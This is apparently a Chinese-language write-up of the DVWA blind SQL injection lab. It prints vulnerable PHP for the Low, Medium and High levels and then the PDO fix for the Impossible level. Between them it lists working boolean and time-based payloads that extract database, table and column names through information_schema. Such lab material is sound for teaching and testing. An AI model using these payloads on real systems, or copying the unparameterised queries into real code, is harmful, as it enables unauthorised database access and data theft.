盲注,顾名思义,无法从界面上直接查看到执行结果,一般的SQL注入基本绝迹,最多的就是盲注
基本步骤:(由于没有回显了,相比一般的SQL注入,也就不需要确定查询字段数、判断回显位置了)
判断注入类型
破库
破表
破字段
获得数据
Low:
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
没有过滤,但是返回就两种结果,要么有,要么没有
看代码就是字符型注入,也可以输入
1 不报错
1’ 报错
1’ and 1=1 # 不报错
1’ and 1=2 # 报错
这样判断
1’ and length(database())=1 # 不存在
一直往下,直到
1’ and length(database())=4 # 不报错显示存在
说明数据库名是4个字符
举几个例子
1’ and ascii(substr(database(),1,1))>97 # 从a开始挨个试数据库名第一个字母吧
1’ and ascii(substr(database(),2,1))>97 # 再试第二个字母,用二分法划定区间,以此类推
之后猜库中表数量
1’ and (select count(table_name) from information_schema.tables where table_schema=database())=1 #
之后猜第一个表名长度(limit 0,1是前一步猜出来有两个表)
1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #
之后猜第一个表的第一个字符
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 #
正常来说,可以猜出整个表名
之后猜表中字段数
1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=1 #
猜字段名
1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 #
还有经典的的二分法时间盲注,不再列举
Medium:
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
mysql_real_escape_string对特殊字符转义,前端有下拉表单限制
既然如此,可以抓包修改参数
例如时间盲注例句
1 and if(length(database())=4,sleep(5),1) #
1 and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #
1 and if((select count(column_name) from information_schema.columns where table_name=0x7573657273 )=8,sleep(5),1) #
等等
High:
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
嗯。。。采用cookie传递id,还对时间盲注有干扰,limit 1 限制了输出结果
那就采用布尔盲注,举几个例子:
抓包将cookie中参数id改为1’ and length(database())=4 #
1’ and length(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #
1’ and (select count(column_name) from information_schema.columns where table_name=0x7573657273)=8 #
Impossible:
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
又是PDO防SQL注入